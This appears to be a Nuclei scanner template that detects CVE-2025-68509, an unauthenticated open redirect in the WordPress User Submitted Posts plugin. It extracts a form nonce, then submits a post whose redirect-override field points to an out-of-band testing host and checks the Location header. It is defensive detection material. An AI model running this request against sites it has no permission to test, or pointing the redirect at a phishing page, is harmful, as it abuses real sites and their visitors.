id: CVE-2025-68509

info:
  name: User Submitted Posts <= 20251121 - Unauthenticated Open Redirect
  author: Shivam Kamboj
  severity: medium
  description: |
    The User Submitted Posts plugin for WordPress is vulnerable to Open Redirect in all versions up to and including 20251121. This is due to insufficient validation on the redirect-override POST parameter. Unauthenticated attackers can redirect users to potentially malicious sites by tricking them into submitting a form.
  impact: |
    Attackers can redirect users to malicious sites, facilitating phishing attacks and credential theft.
  remediation:
    Update to the latest version.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/user-submitted-posts/user-submitted-posts-20251121-unauthenticated-open-redirect
    - https://plugins.trac.wordpress.org/changeset?old_path=/user-submitted-posts/tags/20251121&new_path=/user-submitted-posts/tags/20251210
  metadata:
    verified: true
    max-request: 2
    fofa-query: body="usp-nonce"
  tags: cve,cve2025,wordpress,wp-plugin,user-submitted-posts,open-redirect,wp

variables:
  content: "{{to_lower(rand_text_alphanumeric(6))}}"
  username: "{{rand_text_alphanumeric(12)}}"
  email: "{{username}}@{{to_lower(rand_text_alphanumeric(6))}}.com"

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: word
        words:
          - 'name="usp-nonce"'
        internal: true

    extractors:
      - type: regex
        name: nonce
        part: body
        internal: true
        regex:
          - 'name="usp-nonce"\s+value="([^"]+)"'
        group: 1

  - method: POST
    path:
      - "{{BaseURL}}"
    headers:
      Content-Type: application/x-www-form-urlencoded
    body: "usp-nonce={{nonce}}&user-submitted-title={{rand_int(10000,99999)}}&user-submitted-content={{content}}&user-submitted-name={{username}}&user-submitted-email={{email}}&user-submitted-url=https://test.com&user-submitted-tags=test&user-submitted-category[]=1&user-submitted-captcha=2&redirect-override=https://oast.live/"

    redirects: false

    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)oast\.live\/?(\/|[^.].*)?$'
# digest: 490a0046304402204722a4bde44481a5fe3fdc1956ffae7809ba9a27bcd68c0a762f44197de500e8022030b24380c659812537791d4177f39a55d5c16426e0d8246ffa98408f739c98c8:922c64590222798bb761d5b6d8e72950